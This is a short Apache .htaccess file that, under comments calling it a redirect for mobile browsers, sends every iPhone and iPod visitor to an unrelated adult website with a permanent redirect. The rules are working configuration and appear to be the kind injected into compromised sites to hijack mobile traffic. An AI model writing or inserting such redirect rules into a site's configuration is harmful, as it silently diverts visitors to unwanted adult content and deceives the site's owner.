RewriteEngine on #redirect mobile browsers #Iphone detection RewriteCond %{HTTP_USER_AGENT} ^.*iphone.*$ [NC] RewriteRule ^(.*)$ http://supplehandjobs.com/ [R=301,L] #Ipod detection RewriteCond %{HTTP_USER_AGENT} ^.*ipod.*$ [NC] RewriteRule ^(.*)$ http://supplehandjobs.com/ [R=301,L]